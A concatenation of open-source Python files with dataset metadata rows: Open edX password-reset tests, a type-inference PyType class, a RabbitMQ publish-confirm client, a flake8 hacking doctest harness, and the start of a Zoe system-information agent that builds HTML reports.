|
1
|
15742
|
"""
Test the various password reset flows
"""
import json
import re
import unittest
import ddt
from django.conf import settings
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX
from django.contrib.auth.models import User
from django.contrib.auth.tokens import default_token_generator
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.http import int_to_base36
from edx_oauth2_provider.tests.factories import AccessTokenFactory, ClientFactory, RefreshTokenFactory
from mock import Mock, patch
from oauth2_provider import models as dot_models
from provider.oauth2 import models as dop_models
from openedx.core.djangoapps.oauth_dispatch.tests import factories as dot_factories
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase
from student.tests.factories import UserFactory
from student.tests.test_email import mock_render_to_string
from student.views import SETTING_CHANGE_INITIATED, password_reset, password_reset_confirm_wrapper
from util.testing import EventTestMixin
from .test_configuration_overrides import fake_get_value
@unittest.skipUnless(
settings.ROOT_URLCONF == "lms.urls",
"reset password tests should only run in LMS"
)
@ddt.ddt
class ResetPasswordTests(EventTestMixin, CacheIsolationTestCase):
""" Tests that clicking reset password sends email, and doesn't activate the user
"""
request_factory = RequestFactory()
ENABLED_CACHES = ['default']
def setUp(self):
super(ResetPasswordTests, self).setUp('student.views.tracker')
self.user = UserFactory.create()
self.user.is_active = False
self.user.save()
self.token = default_token_generator.make_token(self.user)
self.uidb36 = int_to_base36(self.user.id)
self.user_bad_passwd = UserFactory.create()
self.user_bad_passwd.is_active = False
self.user_bad_passwd.password = UNUSABLE_PASSWORD_PREFIX
self.user_bad_passwd.save()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_user_bad_password_reset(self):
"""Tests password reset behavior for user with password marked UNUSABLE_PASSWORD_PREFIX"""
bad_pwd_req = self.request_factory.post('/password_reset/', {'email': self.user_bad_passwd.email})
bad_pwd_resp = password_reset(bad_pwd_req)
# If they've got an unusable password, we return a successful response code
self.assertEquals(bad_pwd_resp.status_code, 200)
obj = json.loads(bad_pwd_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
self.assert_no_events_were_emitted()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_nonexist_email_password_reset(self):
"""Now test the exception cases with of reset_password called with invalid email."""
bad_email_req = self.request_factory.post('/password_reset/', {'email': self.user.email + "makeItFail"})
bad_email_resp = password_reset(bad_email_req)
# Note: even if the email is bad, we return a successful response code
# This prevents someone potentially trying to "brute-force" find out which
# emails are and aren't registered with edX
self.assertEquals(bad_email_resp.status_code, 200)
obj = json.loads(bad_email_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
self.assert_no_events_were_emitted()
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_password_reset_ratelimited(self):
""" Try (and fail) resetting password 30 times in a row on an non-existant email address """
cache.clear()
for i in xrange(30):
good_req = self.request_factory.post('/password_reset/', {
'email': 'thisdoesnotexist{0}@foo.com'.format(i)
})
good_resp = password_reset(good_req)
self.assertEquals(good_resp.status_code, 200)
# then the rate limiter should kick in and give a HttpForbidden response
bad_req = self.request_factory.post('/password_reset/', {'email': 'thisdoesnotexist@foo.com'})
bad_resp = password_reset(bad_req)
self.assertEquals(bad_resp.status_code, 403)
self.assert_no_events_were_emitted()
cache.clear()
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_reset_password_email(self, send_email):
"""Tests contents of reset password email, and that user is not active"""
good_req = self.request_factory.post('/password_reset/', {'email': self.user.email})
good_req.user = self.user
dop_client = ClientFactory()
dop_access_token = AccessTokenFactory(user=self.user, client=dop_client)
RefreshTokenFactory(user=self.user, client=dop_client, access_token=dop_access_token)
dot_application = dot_factories.ApplicationFactory(user=self.user)
dot_access_token = dot_factories.AccessTokenFactory(user=self.user, application=dot_application)
dot_factories.RefreshTokenFactory(user=self.user, application=dot_application, access_token=dot_access_token)
good_resp = password_reset(good_req)
self.assertEquals(good_resp.status_code, 200)
self.assertFalse(dop_models.AccessToken.objects.filter(user=self.user).exists())
self.assertFalse(dop_models.RefreshToken.objects.filter(user=self.user).exists())
self.assertFalse(dot_models.AccessToken.objects.filter(user=self.user).exists())
self.assertFalse(dot_models.RefreshToken.objects.filter(user=self.user).exists())
obj = json.loads(good_resp.content)
self.assertEquals(obj, {
'success': True,
'value': "('registration/password_reset_done.html', [])",
})
(subject, msg, from_addr, to_addrs) = send_email.call_args[0]
self.assertIn("Password reset", subject)
self.assertIn("You're receiving this e-mail because you requested a password reset", msg)
self.assertEquals(from_addr, configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL))
self.assertEquals(len(to_addrs), 1)
self.assertIn(self.user.email, to_addrs)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None,
)
#test that the user is not active
self.user = User.objects.get(pk=self.user.pk)
self.assertFalse(self.user.is_active)
re.search(r'password_reset_confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/', msg).groupdict()
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data((False, 'http://'), (True, 'https://'))
@ddt.unpack
def test_reset_password_email_https(self, is_secure, protocol, send_email):
"""
Tests that the right url protocol is included in the reset password link
"""
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.is_secure = Mock(return_value=is_secure)
req.user = self.user
password_reset(req)
_, msg, _, _ = send_email.call_args[0]
expected_msg = "Please go to the following page and choose a new password:\n\n" + protocol
self.assertIn(expected_msg, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data(('Crazy Awesome Site', 'Crazy Awesome Site'), (None, 'edX'))
@ddt.unpack
def test_reset_password_email_domain(self, domain_override, platform_name, send_email):
"""
Tests that the right url domain and platform name is included in
the reset password email
"""
with patch("django.conf.settings.PLATFORM_NAME", platform_name):
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.is_secure = Mock(return_value=True)
req.get_host = Mock(return_value=domain_override)
req.user = self.user
password_reset(req)
_, msg, _, _ = send_email.call_args[0]
reset_intro_msg = "you requested a password reset for your user account at {}".format(platform_name)
self.assertIn(reset_intro_msg, msg)
reset_link = "https://{}/"
if domain_override:
reset_link = reset_link.format(domain_override)
else:
reset_link = reset_link.format(settings.SITE_NAME)
self.assertIn(reset_link, msg)
sign_off = "The {} Team".format(platform_name)
self.assertIn(sign_off, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch("openedx.core.djangoapps.site_configuration.helpers.get_value", fake_get_value)
@patch('django.core.mail.send_mail')
def test_reset_password_email_configuration_override(self, send_email):
"""
Tests that the right url domain and platform name is included in
the reset password email
"""
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.get_host = Mock(return_value=None)
req.user = self.user
password_reset(req)
_, msg, from_addr, _ = send_email.call_args[0]
reset_msg = "you requested a password reset for your user account at {}".format(fake_get_value('platform_name'))
self.assertIn(reset_msg, msg)
self.assert_event_emitted(
SETTING_CHANGE_INITIATED, user_id=self.user.id, setting=u'password', old=None, new=None
)
self.assertEqual(from_addr, "no-reply@fakeuniversity.com")
@ddt.data(
('invalidUid', 'invalid_token'),
(None, 'invalid_token'),
('invalidUid', None),
)
@ddt.unpack
def test_reset_password_bad_token(self, uidb36, token):
"""Tests bad token and uidb36 in password reset"""
if uidb36 is None:
uidb36 = self.uidb36
if token is None:
token = self.token
bad_request = self.request_factory.get(
reverse(
"password_reset_confirm",
kwargs={"uidb36": uidb36, "token": token}
)
)
password_reset_confirm_wrapper(bad_request, uidb36, token)
self.user = User.objects.get(pk=self.user.pk)
self.assertFalse(self.user.is_active)
def test_reset_password_good_token(self):
"""Tests good token and uidb36 in password reset"""
url = reverse(
"password_reset_confirm",
kwargs={"uidb36": self.uidb36, "token": self.token}
)
good_reset_req = self.request_factory.get(url)
password_reset_confirm_wrapper(good_reset_req, self.uidb36, self.token)
self.user = User.objects.get(pk=self.user.pk)
self.assertTrue(self.user.is_active)
def test_password_reset_fail(self):
"""Tests that if we provide mismatched passwords, user is not marked as active."""
self.assertFalse(self.user.is_active)
url = reverse(
'password_reset_confirm',
kwargs={'uidb36': self.uidb36, 'token': self.token}
)
request_params = {'new_password1': 'password1', 'new_password2': 'password2'}
confirm_request = self.request_factory.post(url, data=request_params)
# Make a password reset request with mismatching passwords.
resp = password_reset_confirm_wrapper(confirm_request, self.uidb36, self.token)
# Verify the response status code is: 200 with password reset fail and also verify that
# the user is not marked as active.
self.assertEqual(resp.status_code, 200)
self.assertFalse(User.objects.get(pk=self.user.pk).is_active)
@override_settings(PASSWORD_MIN_LENGTH=2)
@override_settings(PASSWORD_MAX_LENGTH=10)
@ddt.data(
{
'password': '1',
'error_message': 'Password: Invalid Length (must be 2 characters or more)',
},
{
'password': '01234567891',
'error_message': 'Password: Invalid Length (must be 10 characters or fewer)'
}
)
def test_password_reset_with_invalid_length(self, password_dict):
"""Tests that if we provide password characters less then PASSWORD_MIN_LENGTH,
or more than PASSWORD_MAX_LENGTH, password reset will fail with error message.
"""
url = reverse(
'password_reset_confirm',
kwargs={'uidb36': self.uidb36, 'token': self.token}
)
request_params = {'new_password1': password_dict['password'], 'new_password2': password_dict['password']}
confirm_request = self.request_factory.post(url, data=request_params)
# Make a password reset request with minimum/maximum passwords characters.
response = password_reset_confirm_wrapper(confirm_request, self.uidb36, self.token)
self.assertEqual(response.context_data['err_msg'], password_dict['error_message'])
@patch('student.views.password_reset_confirm')
@patch("openedx.core.djangoapps.site_configuration.helpers.get_value", fake_get_value)
def test_reset_password_good_token_configuration_override(self, reset_confirm):
"""Tests password reset confirmation page for site configuration override."""
url = reverse(
"password_reset_confirm",
kwargs={"uidb36": self.uidb36, "token": self.token}
)
good_reset_req = self.request_factory.get(url)
password_reset_confirm_wrapper(good_reset_req, self.uidb36, self.token)
confirm_kwargs = reset_confirm.call_args[1]
self.assertEquals(confirm_kwargs['extra_context']['platform_name'], 'Fake University')
self.user = User.objects.get(pk=self.user.pk)
self.assertTrue(self.user.is_active)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', "Test only valid in LMS")
@patch('django.core.mail.send_mail')
@ddt.data('Crazy Awesome Site', 'edX')
def test_reset_password_email_subject(self, platform_name, send_email):
"""
Tests that the right platform name is included in
the reset password email subject
"""
with patch("django.conf.settings.PLATFORM_NAME", platform_name):
req = self.request_factory.post(
'/password_reset/', {'email': self.user.email}
)
req.user = self.user
password_reset(req)
subj, _, _, _ = send_email.call_args[0]
self.assertIn(platform_name, subj)
|
agpl-3.0
| -2,669,021,319,108,499,000 | 43.849003 | 120 | 0.652395 | false |
PiJoules/python-type-inference
|
pytype.py
|
1
|
13687
|
class PyType:
NEW_METHOD = "__new__"
INIT_METHOD = "__init__"
DEL_METHOD = "__del__"
REPR_METHOD = "__repr__"
STR_METHOD = "__str__"
BYTES_METHOD = "__bytes__"
FORMAT_METHOD = "__format__"
LT_METHOD = "__lt__"
LE_METHOD = "__le__"
EQ_METHOD = "__eq__"
NE_METHOD = "__ne__"
GT_METHOD = "__gt__"
GE_METHOD = "__ge__"
HASH_METHOD = "__hash__"
BOOL_METHOD = "__bool__"
GETATTR_METHOD = "__getattr__"
GETATTRIBUTE_METHOD = "__getattribute__"
SETATTR_METHOD = "__setattr__"
DELATTR_METHOD = "__delattr__"
DIR_METHOD = "__dir__"
GETITEM_METHOD = "__getitem__"
CONTAINS_METHOD = "__contains__"
NEXT_METHOD = "__next__"
ITER_METHOD = "__iter__"
ADD_METHOD = "__add__"
SUB_METHOD = "__sub__"
MUL_METHOD = "__mul__"
TRUEDIV_METHOD = "__truediv__"
IADD_METHOD = "__iadd__"
def __init__(self, name, init_attrs=None, parents=None):
"""
Args:
name (str)
init_attrs (Optional[dict[str, set[PyType]]])
parents (Optional[list[PyType]])
"""
assert isinstance(name, str)
self.__name = name
self.__attrs = init_attrs or {} # dict[str, set[PyType]]
self.__parents = parents or []
def parents(self):
return self.__parents
def name(self):
"""
The name of this type. This is equivalent to the result
of obj.__class__.
"""
return self.__name
def attrs(self):
"""
Returns:
dict[str, set[PyType]]
"""
attrs = {}
for parent in self.parents():
for attr, types in parent.attrs().items():
if attr in attrs:
attrs[attr] |= types
else:
attrs[attr] = set(types)
for attr, types in self.__attrs.items():
if attr in attrs:
attrs[attr] |= types
else:
attrs[attr] = set(types)
return attrs
def has_attr(self, attr):
return attr in self.attrs()
def exclusive_has_attr(self, attr):
return attr in self.__attrs
def is_type(self, other):
"""
Args:
other (class_type.ClassType)
"""
if self.name() == other.name():
return True
for parent in self.parents():
if parent.is_type(other):
return True
return False
"""
Wrappers for magic methods that affect this pytype.
"""
def set_attr(self, attr, types):
assert isinstance(types, set)
assert all(isinstance(x, PyType) for x in types)
if self.exclusive_has_attr(attr):
self.__attrs[attr] |= types
else:
self.__attrs[attr] = set(types)
def get_attr(self, attr):
if self.has_attr(attr):
return self.attrs()[attr]
else:
from class_type import ClassType
if isinstance(self, ClassType):
raise KeyError("Attribute '{}' not in class '{}'".format(attr, self.defined_name()))
else:
raise KeyError("Attribute '{}' not in pytype '{}'".format(attr, self.name()))
def call_attr(self, attr, args):
"""
Call an attribute of this type. The result is the set of all results of
calling each type that an attribute can be.
Equivalent to: x.attr(args)
Returns:
set[PyType]
"""
types = set()
attrs = self.get_attr(attr)
for t in attrs:
types |= t.call(args)
return types
def _call_and_check_return(self, attr, expected, args):
"""
Call an attribute and check that it returns an expected type. This is
for methods like __hash__ or __str__ which must return specifically
strs and ints otherwise a TypeError is raised.
Args:
attr (str)
expected (PyType)
args (arguments.Arguments)
Returns:
set[PyType]
"""
if self.has_attr(attr):
results = self.call_attr(attr, args)
if results != {expected}:
raise TypeError("{} for type '{}' returned non-{} (type {})".format(attr, self.name(), expected.name(), results))
return {expected}
def _optional_call(self, attr, default, args):
"""
Call an attribute if it exists and return the results. Otherwise,
return the default.
Args:
attr (str)
default (PyType)
args (arguments.Arguments)
Returns:
set[PyType]
"""
if self.has_attr(attr):
return self.call_attr(attr, args)
else:
return {default}
"""
Implementations of magic methods
http://www.diveintopython3.net/special-method-names.html
These methods are ment to be used internally by this package and do not
interact with the nodes returned by the python ast module. These methods
handle only internal pytypes and should not accept or return ast nodes.
"""
def call(self, args):
"""
This emulates as if a variable was called in python space. This is for
types that act like functions.
Equivalent to: x(args) or x.__call__(args)
Returns:
set[PyType]
"""
raise RuntimeError("pytype '{}' is not callable".format(self.name()))
def call_new(self, args):
"""
Called once when a class is defined.
"""
from builtin_types import NONE_TYPE
return self._optional_call(self.NEW_METHOD, NONE_TYPE, args)
def call_init(self, args):
"""
Only call this method if it is defined. Otherwise is does nothing.
"""
from builtin_types import NONE_TYPE
return self._optional_call(self.INIT_METHOD, NONE_TYPE, args)
def call_del(self, args):
return self.call_attr(self.DEL_METHOD, args)
"""
These methods must return specific types. If they are custom implemented
and do not return their specific types, a TypeError is raised at runtime.
"""
def call_repr(self, args):
from str_type import STR_CLASS
return self._call_and_check_return(self.REPR_METHOD, STR_CLASS.instance(), args)
def call_str(self, args):
from str_type import STR_CLASS
return self._call_and_check_return(self.STR_METHOD, STR_CLASS.instance(), args)
def call_bytes(self, args):
from bytes_type import BYTES_CLASS
return self._call_and_check_return(self.BYTES_METHOD, BYTES_CLASS.instance(), args)
def call_format(self, args):
"""
This is what is called when performing a string format.
Example at https://pyformat.info/#custom_1
"""
from str_type import STR_CLASS
return self._call_and_check_return(self.FORMAT_METHOD, STR_CLASS.instance(), args)
"""
Rich comparison methods
Only __eq__ and __ne__ are implemented by default where __eq__ compares the
hash's of both objects and __ne__ is the inverse of the result of __eq__.
"""
def call_lt(self, args):
return self.call_attr(self.LT_METHOD, args)
def call_le(self, args):
return self.call_attr(self.LE_METHOD, args)
def call_eq(self, args):
from builtin_types import BOOL_TYPE
return self._optional_call(self.EQ_METHOD, BOOL_TYPE, args)
def call_ne(self, args):
from builtin_types import BOOL_TYPE
return self._optional_call(self.NE_METHOD, BOOL_TYPE, args)
def call_gt(self, args):
return self.call_attr(self.GT_METHOD, args)
def call_ge(self, args):
return self.call_attr(self.GE_METHOD, args)
def call_hash(self, args):
from builtin_types import INT_TYPE
return self._call_and_check_return(self.HASH_METHOD, INT_TYPE, args)
def call_bool(self, args):
from builtin_types import BOOL_TYPE
return self._call_and_check_return(self.BOOL_METHOD, BOOL_TYPE, args)
"""
Attribute access
"""
def call_getattr(self, args):
"""
This method is a wrapper for calling x.__getattr__. Ideally, this
method will not actually be called explicitly by this package since
the get_attr() method will be called instead. This method will
really only be called when the __getattr__ method is explicitly called
by the python program.
"""
raise NotImplementedError("TODO: Implement logic for handling __getattr__")
def call_getattribute(self, args):
"""
This method is the uncoditional call for x.attr.
"""
raise NotImplementedError("TODO: Implement logic for handling __getattribute__")
def call_setattr(self, args):
raise NotImplementedError("TODO: Implement logic for handling __setattr__")
def call_delattr(self, args):
return self.call_attr(self.DELATTR_METHOD, args)
def call_dir(self, args):
from tuple_type import TUPLE_CLASS
return self._call_and_check_return(self.DIR_METHOD, TUPLE_CLASS.instance().new_container(), args)
"""
Emulating container types
"""
def call_getitem(self, args):
return self.call_attr(self.GETITEM_METHOD, args)
def call_contains(self, args):
return self.call_attr(self.CONTAINS_METHOD, args)
"""
Emulating numeric types
"""
def _alt_method(self, alt, method):
"""Get an alternated method."""
assert method.startswith("__")
assert method.endswith("__")
return "__" + alt + method[2:-2] + "__"
def _rmethod(self, method):
"""Get the reflected method."""
return self._alt_method("r", method)
def _imethod(self, method):
"""Get the augmented (inplace) method."""
return self._alt_method("i", method)
def _call_numeric_op(self, method, args, aug=False):
from arguments import Arguments
if aug:
i_meth = self._imethod(method)
return self.call_attr(i_meth, args)
if self.has_attr(method):
return self.call_attr(method, args)
else:
# Get the reflected magic method
r_meth = self._rmethod(method)
# Get the right side typs
pos_args = args.pos_args()
if len(pos_args) != 1:
raise RuntimeError("Expected 1 argument for numeric operation")
right_types = pos_args.pop()
results = set()
for t in right_types:
if t.has_attr(r_meth):
results |= t.call_attr(r_meth, Arguments([self]))
else:
raise RuntimeError("No support for {} or {} on types '{}' and '{}'".format(method, r_meth, self, t))
return results
def call_add(self, args, **kwargs):
return self._call_numeric_op(self.ADD_METHOD, args, **kwargs)
def call_sub(self, args, **kwargs):
return self._call_numeric_op(self.SUB_METHOD, args, **kwargs)
def call_mul(self, args, **kwargs):
return self._call_numeric_op(self.MUL_METHOD, args, **kwargs)
def call_truediv(self, args, **kwargs):
return self._call_numeric_op(self.TRUEDIV_METHOD, args, **kwargs)
"""
Iterator types
"""
def call_iter(self, args):
return self.call_attr(self.ITER_METHOD, args)
def call_next(self, args):
return self.call_attr(self.NEXT_METHOD, args)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.name())
def __eq__(self, other):
raise NotImplementedError("Must implement __eq__ for pytype '{}'".format(type(self)))
def __str__(self):
return self.name()
def load_buultin_constants():
from builtin_types import STR_TYPE
return {
"__name__": {STR_TYPE},
}
def load_builtin_vars():
from function_type import BuiltinFunction
from instance_type import InstanceType
from tuple_type import TUPLE_CLASS
from dict_type import DICT_CLASS
from builtin_types import (
INT_CLASS, FLOAT_CLASS, BOOL_CLASS, STR_CLASS, FILE_CLASS,
NONE_TYPE, INT_TYPE, FILE_TYPE, BOOL_TYPE, STR_TYPE
)
from value_error_type import VALUE_ERROR_CLASS
"""
Builtin functions
"""
class PrintFunction(BuiltinFunction):
def __init__(self):
super().__init__(
"print",
vararg="objects",
kwonlyargs=["sep", "end", "file", "flush"],
kwonly_defaults=[
{STR_TYPE},
{STR_TYPE},
{FILE_TYPE},
{BOOL_TYPE},
]
)
def call(self, args):
return {NONE_TYPE}
print_func = PrintFunction()
class InputFunction(BuiltinFunction):
def __init__(self):
super().__init__(
"input",
keywords=["prompt"],
keyword_defaults=[{STR_TYPE}],
)
def call(self, args):
return {STR_TYPE}
input_func = InputFunction()
builtins = {
"int": {INT_CLASS},
"float": {FLOAT_CLASS},
"bool": {BOOL_CLASS},
"str": {STR_CLASS},
"tuple": {TUPLE_CLASS},
"dict": {DICT_CLASS},
"print": {print_func},
"input": {input_func},
"ValueError": {VALUE_ERROR_CLASS},
}
builtins.update(load_buultin_constants())
return builtins
|
mit
| -4,542,938,915,994,257,400 | 28.245726 | 129 | 0.560532 | false |
lipixun/pytest
|
rabbitmq/publishconfirm/client.py
|
1
|
2881
|
#!/usr/bin/env python
# encoding=utf8
# The publish confirm test client
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import gevent
from gevent import monkey
monkey.patch_all()
from haigha.connections.rabbit_connection import RabbitConnection
from haigha.message import Message
class Client(object):
"""The RPC Client
"""
def __init__(self, host, port, vhost, user, password):
"""Create a new Server
"""
self._conn = RabbitConnection(transport = 'gevent', host = host, port = port, vhost = vhost, user = user, password = password)
gevent.spawn(self.loop)
self._channel = self._conn.channel()
self._channel.confirm.select()
self._channel.basic.set_return_listener(self.onBasicReturn)
self._channel.basic.set_ack_listener(self.onDeliverAck)
self._channel.basic.set_nack_listener(self.onDeliverNAck)
def loop(self):
"""The loop
"""
while self._conn:
self._conn.read_frames()
gevent.sleep()
def onBasicReturn(self, message):
"""On basic return
"""
print 'Basic return message [%s]' % message
def onDeliverAck(self, messageID):
"""On deliver ACK
"""
print 'Deliver ACK [%s]' % messageID
def onDeliverNAck(self, messageID, requeue):
"""On deliver nack
"""
print 'Deliver NACK [%s] Requeue [%s]' % (messageID, requeue)
def call(self, content, queue):
"""The call method
"""
return self._channel.basic.publish(Message(content), '', queue)
if __name__ == '__main__':
from argparse import ArgumentParser
def getArguments():
"""Get arguments
"""
parser = ArgumentParser(description = 'Confirm test client')
parser.add_argument('--host', dest = 'host', required = True, help = 'The host')
parser.add_argument('--port', dest = 'port', default = 5672, type = int, help = 'The port')
parser.add_argument('--vhost', dest = 'vhost', default = '/test', help = 'The virtual host')
parser.add_argument('--user', dest = 'user', default = 'test', help = 'The user name')
parser.add_argument('--password', dest = 'password', default = 'test', help = 'The password')
# Done
return parser.parse_args()
def main():
"""The main entry
"""
args = getArguments()
# Create the server
client = Client(args.host, args.port, args.vhost, args.user, args.password)
# Send the messages
msgID = client.call('A good message', 'test_confirm')
print 'Sent good message [%s]' % msgID
msgID = client.call('A bad message', 'a_none_existed_queue')
print 'Sent bad message [%s]' % msgID
print 'Wait for deliver ack / nack'
# Done
gevent.sleep(1000)
main()
|
gpl-2.0
| 3,695,272,715,719,721,500 | 31.370787 | 134 | 0.597015 | false |
hyakuhei/cleantox
|
hacking/tests/test_doctest.py
|
1
|
3232
|
#!/usr/bin/env python
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from flake8 import engine
import pep8
import pkg_resources
import six
import testscenarios
from testtools import content
from testtools import matchers
import hacking
import hacking.tests
SELFTEST_REGEX = re.compile(r'\b(Okay|[HEW]\d{3}):\s(.*)')
# Each scenario is (name, dict(lines=.., options=..., code=...))
file_cases = []
class HackingTestCase(hacking.tests.TestCase):
scenarios = file_cases
def test_pep8(self):
report = pep8.BaseReport(self.options)
checker = pep8.Checker(lines=self.lines, options=self.options,
report=report)
checker.check_all()
self.addDetail('doctest', content.text_content(self.raw))
if self.code == 'Okay':
self.assertThat(
len(report.counters),
matchers.Not(matchers.GreaterThan(
len(self.options.benchmark_keys))),
"incorrectly found %s" % ', '.join(
[key for key in report.counters
if key not in self.options.benchmark_keys]))
else:
self.addDetail('reason',
content.text_content("Failed to trigger rule %s" %
self.code))
self.assertIn(self.code, report.counters)
def _get_lines(check):
for line in check.__doc__.splitlines():
line = line.lstrip()
match = SELFTEST_REGEX.match(line)
if match is None:
continue
yield (line, match.groups())
def load_tests(loader, tests, pattern):
flake8_style = engine.get_style_guide(parse_argv=False,
# Ignore H104 otherwise it's
# raised on doctests.
ignore=('F', 'H104'))
options = flake8_style.options
for entry in pkg_resources.iter_entry_points('flake8.extension'):
if not entry.module_name.startswith('hacking.'):
continue
check = entry.load()
name = entry.attrs[0]
if check.skip_on_py3 and six.PY3:
continue
for (lineno, (raw, (code, source))) in enumerate(_get_lines(check)):
lines = [part.replace(r'\t', '\t') + '\n'
for part in source.split(r'\n')]
file_cases.append(("%s-line-%s" % (name, lineno),
dict(lines=lines, raw=raw, options=options,
code=code)))
return testscenarios.load_tests_apply_scenarios(loader, tests, pattern)
|
apache-2.0
| 6,823,572,021,448,614,000 | 34.911111 | 77 | 0.586015 | false |
rmed/zoe-sysinfo
|
agents/sysinfo/sysinfo.py
|
1
|
12303
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Zoe Sysinfo - https://github.com/rmed/zoe-sysinfo
#
# Copyright (c) 2015 Rafael Medina García <rafamedgar@gmail.com>
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.)
import sys
sys.path.append('./lib')
import base64
import psutil
import zoe
from datetime import datetime
from zoe.deco import *
HTML_HEADER = """
<html>
<head>
<style>
h2 {
border-bottom: 1px solid #CCCCCC;
margin-top: 20px;
width: 100%;
}
table {
border-collapse: separate;
border-spacing: 5px;
}
</style>
</head><body>"""
HTML_FOOTER = "</body></html>"
@Agent(name="sysinfo")
class Sysinfo:
@Message(tags=["report"])
def complete_report(self, sender, src):
""" Send a complete report to user by mail. """
HTML = "" + HTML_HEADER
# CPU
cpu_html = "<h2>CPU Information</h2><ul>"
cpu_info = self.gather_cpu()
for cpu in cpu_info.keys():
info = cpu_info[cpu]
cpu_html += """
<li>%s<ul>
<li>User: %s %%</li>
<li>System: %s %%</li>
<li>Idle: %s %%</li>
</ul></li>""" % (
cpu.upper(), str(info["user"]),
str(info["system"]), str(info["idle"]))
cpu_html += "</ul>"
# Disks
disk_html = "<h2>Disk Information</h2><ul>"
disk_info = self.gather_disk()
for disk in disk_info.keys():
info = disk_info[disk]
usage = disk_info[disk]["usage"]
disk_html += """
<li>%s<ul>
<li>Mount point: %s</li>
<li>Filesystem: %s</li>
<li>Options: %s</li>
<li>Usage:<ul>
<li>Total: %s</li>
<li>Used: %s</li>
<li>Free: %s</li>
<li>Percentage used: %s %%</li>
</ul></li>
</ul></li>""" % (
disk,
info["mountpoint"],
info["fstype"],
info["opts"],
self.size_fmt(usage["total"]),
self.size_fmt(usage["used"]),
self.size_fmt(usage["free"]),
str(usage["percentage"]))
disk_html += "</ul>"
# Memory
mem_html = "<h2>Memory Information</h2><ul>"
mem_info = self.gather_memory()
for mem_type in mem_info.keys():
info = mem_info[mem_type]
mem_html += """
<li>%s<ul>
<li>Total: %s</li>
<li>Free: %s</li>
<li>Used: %s</li>
<li>Percentage used: %s</li>
</ul></li>""" % (
mem_type.title(),
self.size_fmt(info["total"]),
self.size_fmt(info["free"]),
self.size_fmt(info["used"]),
str(info["percentage"]))
mem_html += "</ul>"
# Processes
proc_html = "<h2>Running processes Information</h2><table>"
proc_html += """<tr>
<th>PID</th>
<th>Name</th>
<th>User</th>
<th>Status</th>
<th>Exec</th>
<th>Resident Memory</th>
<th>Virtual Memory</th></tr>"""
proc_info = self.gather_proc()
for proc in proc_info.keys():
info = proc_info[proc]
proc_html += """<tr>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td></tr>""" % (
str(proc),
str(info["name"]),
str(info["username"]),
str(info["status"]),
str(info["exe"]),
self.size_fmt(info["memory"]["resident"]),
self.size_fmt(info["memory"]["virtual"]))
proc_html += "</table>"
HTML += cpu_html + disk_html + mem_html + proc_html + HTML_FOOTER
attachment = self.attach_html(HTML)
return (self.feedback("Generating report...", sender, src),
self.feedback(attachment, sender, "mail"))
@Message(tags=["cpu"])
def info_cpu(self, sender, src):
""" Send basic information on CPU usage jabber or Telegram. """
cpu_info = self.gather_cpu()
